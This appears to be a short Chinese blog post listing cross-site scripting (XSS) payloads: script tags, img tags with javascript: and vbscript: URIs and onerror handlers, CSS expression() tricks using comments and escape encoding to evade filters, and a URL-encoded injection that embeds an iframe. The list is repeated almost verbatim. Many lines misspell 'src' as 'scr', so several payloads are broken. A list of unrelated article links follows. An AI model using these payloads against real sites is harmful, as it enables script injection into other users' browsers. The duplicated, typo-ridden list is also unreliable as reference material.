跨站语句
2016-06-11 11:43
323 查看
<script>alert("跨站")</script> (最常用)
<img scr=javascript:alert("跨站")></img>
<img scr="javascript: alert(/跨站/)></img>
<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)
<img scr="#" onerror=alert(/跨站/)></img>
<img scr="#" style="xss:expression(alert(/xss/));"></img>
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)
<img src=vbscript:msgbox ("xss")></img>
<style> input {left:expression (alert('xss'))}</style>
<div style={left:expression (alert('xss'))}></div>
<div style={left:exp/* */ression (alert('xss'))}></div>
<div style={left:\0065\0078ression (alert('xss'))}></div>
html 实体 <div style={left:x0065;xpression (alert('xss'))}></div>
unicode <div style="{left:expRessioN (alert('xss'))}">
"]}%3Cscript%3Ealert('test')%3C/script%3E{[&item="]<iframe%20src=http://www.baidu.com%20width=400%20height=600></iframe>["
<img scr=javascript:alert("跨站")></img>
<img scr="javascript: alert(/跨站/)></img>
<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)
<img scr="#" onerror=alert(/跨站/)></img>
<img scr="#" style="xss:expression(alert(/xss/));"></img>
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)
<img src=vbscript:msgbox ("xss")></img>
<style> input {left:expression (alert('xss'))}</style>
<div style={left:expression (alert('xss'))}></div>
<div style={left:exp/* */ression (alert('xss'))}></div>
<div style={left:\0065\0078ression (alert('xss'))}></div>
html 实体 <div style={left:x0065;xpression (alert('xss'))}></div>
unicode <div style="{left:expRessioN (alert('xss'))}">
"]}%3Cscript%3Ealert('test')%3C/script%3E{[&item="]<iframe%20src=http://www.baidu.com%20width=400%20height=600></iframe>["
相关文章推荐
- s3c2440 LCD驱动编写
- 运维知识:RAID磁盘阵列配置和调优小结
- 1. Two Sum
- Spring基础—Bean容器
- OpenERP|ODOO高德地图应用
- 网络配置与挂载
- 1004 Financial Management
- left join中on和where的区别是什么
- Define your own binary operators
- Javascript 异步加载详解
- Hibernate中的一级缓存、二级缓存和懒加载
- 二叉排序树(三序输出)
- 查找代码错误.java
- 动态计算tablviewcell高度
- java创建邮件模板
- UI Components的理解
- 挂载分区
- 3.Android群英传读书笔记-控件架构与自定义控件
- Android中数据文件解析(Json解析)
- 剑指offer(五十七)之二叉树的下一个结点